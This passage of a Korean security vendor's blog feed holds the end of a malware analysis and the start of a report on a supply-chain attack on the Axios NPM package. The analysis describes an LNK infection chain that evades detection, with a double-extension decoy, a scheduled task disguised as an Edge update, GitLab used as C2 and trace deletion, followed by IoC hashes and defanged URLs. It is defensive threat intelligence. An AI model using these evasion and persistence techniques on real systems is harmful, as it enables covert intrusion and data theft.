style=&quot;color: #1f2328;&quot;&gt;추적을&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;피하기&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;쉽습니다&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;다단계&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;구조를&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;통한&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;탐지&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;b&gt;우회&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;LNK &lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &amp;rarr; 1&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;차&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;스크립트&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &amp;rarr; 2&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;차&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;스크립트&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &amp;rarr; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;정보탈취&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;스크립트로&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;이어지는&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;다단계&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;구조를&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;사용하여&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;각&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;단계에서&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;보안&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;솔루션의&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;탐지&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;가능성을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;분산시킵니다&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;. &lt;br /&gt;&lt;/span&gt;악성&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;코드&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;자체도&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;암호화된&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;형태로&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;배포되기&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;때문에&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;파일&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;기반&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;정적&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;탐지를&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;우회합니다&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;예약&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;작업&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;위장을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;통한&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;지속성&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;b&gt;확보&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;Microsoft Edge &lt;span style=&quot;letter-spacing: 0px;&quot;&gt;업데이트&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;작업명으로&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;위장한&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;예약&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;작업을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;통해&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;시스템&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;재부팅&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;이후에도&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; 35&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;분&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;주기로&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;악성&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;스크립트가&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;반복&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;실행됩니다&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;. &lt;/span&gt;공격자는&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;이&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;구조를&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;이용해&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; GitLab &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;저장소의&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일만&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;교체하면&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;피해자&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;시스템에서&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;실행되는&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;악성코드를&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;원격으로&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;업데이트할&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;수&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;있습니다&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;증거&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;인멸을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;위한&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;흔적&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;b&gt;삭제&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;정보&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;전송&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;완료&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;후&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;수집&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;암호화&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;스크립트&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;자신까지&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;모두&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;강제&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;삭제하여&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;감염&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;시스템에&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;흔적을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;최소화합니다&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;이번&lt;/span&gt; &lt;span&gt;공격은&lt;/span&gt;&lt;span&gt; .pdf.lnk&lt;/span&gt;&lt;span&gt;와&lt;/span&gt; &lt;span&gt;같은&lt;/span&gt; &lt;span&gt;이중&lt;/span&gt; &lt;span&gt;확장자로&lt;/span&gt; &lt;span&gt;정상&lt;/span&gt; &lt;span&gt;문서처럼&lt;/span&gt; &lt;span&gt;위장하고&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;클릭&lt;/span&gt; &lt;span&gt;시&lt;/span&gt; &lt;span&gt;실제&lt;/span&gt; &lt;span&gt;정상&lt;/span&gt; &lt;span&gt;문서&lt;/span&gt; &lt;span&gt;파일을&lt;/span&gt; &lt;span&gt;함께&lt;/span&gt; &lt;span&gt;보여주는&lt;/span&gt; &lt;span&gt;미끼&lt;/span&gt; &lt;span&gt;파일&lt;/span&gt; &lt;span&gt;기법을&lt;/span&gt; &lt;span&gt;활용하여&lt;/span&gt; &lt;span&gt;사용자가&lt;/span&gt; &lt;span&gt;감염&lt;/span&gt; &lt;span&gt;사실을&lt;/span&gt; &lt;span&gt;인지하기&lt;/span&gt; &lt;span&gt;어렵게&lt;/span&gt; &lt;span&gt;만듭니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;또한&lt;/span&gt; &lt;span&gt;합법적인&lt;/span&gt; &lt;span&gt;플랫폼인&lt;/span&gt; &lt;span&gt;깃랩을&lt;/span&gt;&lt;span&gt; C2 &lt;/span&gt;&lt;span&gt;서버로&lt;/span&gt; &lt;span&gt;악용해&lt;/span&gt; &lt;span&gt;정상&lt;/span&gt; &lt;span&gt;트래픽으로&lt;/span&gt; &lt;span&gt;위장함으로써&lt;/span&gt; &lt;span&gt;네트워크&lt;/span&gt; &lt;span&gt;보안&lt;/span&gt; &lt;span&gt;장비의&lt;/span&gt; &lt;span&gt;탐지까지&lt;/span&gt; &lt;span&gt;우회하는&lt;/span&gt; &lt;span&gt;정교한&lt;/span&gt; &lt;span&gt;공격입니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;이러&lt;/span&gt; &lt;span&gt;공격을&lt;/span&gt; &lt;span&gt;예방하기&lt;/span&gt; &lt;span&gt;위해서는&lt;/span&gt; &lt;span&gt;출처가&lt;/span&gt; &lt;span&gt;불분명한&lt;/span&gt; &lt;span&gt;파일의&lt;/span&gt; &lt;span&gt;실행을&lt;/span&gt; &lt;span&gt;자제해&lt;/span&gt; &lt;span&gt;주시고&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;특히&lt;/span&gt; &lt;span&gt;윈도우&lt;/span&gt; &lt;span&gt;탐색기의&lt;/span&gt;&lt;span&gt; '&lt;/span&gt;&lt;span&gt;파일&lt;/span&gt; &lt;span&gt;확장명&lt;/span&gt; &lt;span&gt;표시&lt;/span&gt;&lt;span&gt;' &lt;/span&gt;&lt;span&gt;옵션을&lt;/span&gt; &lt;span&gt;상시&lt;/span&gt; &lt;span&gt;활성화하여&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;이중&lt;/span&gt; &lt;span&gt;확장자로&lt;/span&gt; &lt;span&gt;위장한&lt;/span&gt; &lt;span&gt;파일은&lt;/span&gt; &lt;span&gt;실행하지&lt;/span&gt; &lt;span&gt;않도록&lt;/span&gt; &lt;span&gt;각별히&lt;/span&gt; &lt;span&gt;주의하시기&lt;/span&gt; &lt;span&gt;바랍니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;ioc-container&quot;&gt;
&lt;p style=&quot;font-weight: bold; color: #1a2c4e; margin-bottom: 15px;&quot; data-ke-size=&quot;size18&quot;&gt;IoC&lt;/p&gt;
&lt;table style=&quot;width: 100%; border-collapse: collapse; line-height: 1.6; font-size: 14px; height: 118px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: left; background-color: #fcfcfc; height: 22px;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 44.186%; color: #333333; height: 22px;&quot;&gt;Indicator&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 14.7675%; color: #333333; height: 22px;&quot;&gt;Type&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 14.7675%; color: #333333; height: 22px;&quot;&gt;Description&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 26.279%; color: #333333; height: 22px;&quot;&gt;Detection Name&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 44.186%; height: 24px;&quot;&gt;5577fffb5b5acd3771ef9dc696498f1e&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 14.7675%; height: 24px;&quot;&gt;MD5&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 14.7675%; height: 24px;&quot;&gt;LNK 파일&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.279%; height: 24px;&quot;&gt;Trojan.Agent.LNK.Gen&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 44.186%; height: 24px;&quot;&gt;302725413076d1aeaee2d7f2b3692646&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 14.7675%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;MD5&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 14.7675%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #666666; text-align: start;&quot;&gt;LNK 파일&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.279%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #666666; text-align: start;&quot;&gt;Trojan.Agent.LNK.Gen&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 44.186%; height: 24px;&quot;&gt;hxxps[://]gitlab[.]com/arkiler-group/at&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 14.7675%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;gitlab&lt;/span&gt; 저장소&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 14.7675%; height: 24px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.279%; height: 24px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 44.186%; height: 24px;&quot;&gt;hxxps[://]gitlab[.]com/kevin-group5101713/ri/hifer&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 14.7675%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;gitlab&lt;/span&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;저장소&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 14.7675%; height: 24px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.279%; height: 24px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>악성코드 분석 리포트</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5743</guid>
      <comments>https://alyacofficialblog.tistory.com/5743#entry5743comment</comments>
      <pubDate>Fri, 3 Apr 2026 18:32:31 +0900</pubDate>
    </item>
    <item>
      <title>Axios NPM 패키지 공급망 공격 발생</title>
      <link>https://alyacofficialblog.tistory.com/5742</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c8QAqA/dJMcadnVyly/ua4hsKrGtFjTYK9FweBVVK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c8QAqA/dJMcadnVyly/ua4hsKrGtFjTYK9FweBVVK/img.png&quot; data-alt=&quot;[이미지] 생성형 AI 제작&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c8QAqA/dJMcadnVyly/ua4hsKrGtFjTYK9FweBVVK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc8QAqA%2FdJMcadnVyly%2Fua4hsKrGtFjTYK9FweBVVK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1536&quot; height=&quot;1024&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 생성형 AI 제작&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;최근&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;Axios&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;의&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;공식 저장소(NPM)&lt;/span&gt;&lt;span&gt;를&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;통해 악성 코드가 유포되는 공격이 발생했습니다. &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;북&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;한 배후의 해킹 그룹&lt;/span&gt;&lt;span&gt;에 의한 것으로 분석되는 이번 공격은,&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;해당 프로그램을 관리하는 공식 개발자의 계정을 탈취&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;하고 정교한 은폐 기법을 사용하여 전 세계 개발 환경 침투를 시도했습니다.&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Axios (액시오스): &lt;/b&gt;자바스크립트(JavaScript) 환경에서 서버와 데이터를 주고받기 위해 사용하는 HTTP 클라이언트 라이브러리입니다. 브라우저와 Node.js 환경 모두에서 동작하며, API 호출 및 데이터 수신에 있어 표준처럼 사용되는 매우 대중적인 오픈소스 도구입니다.&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
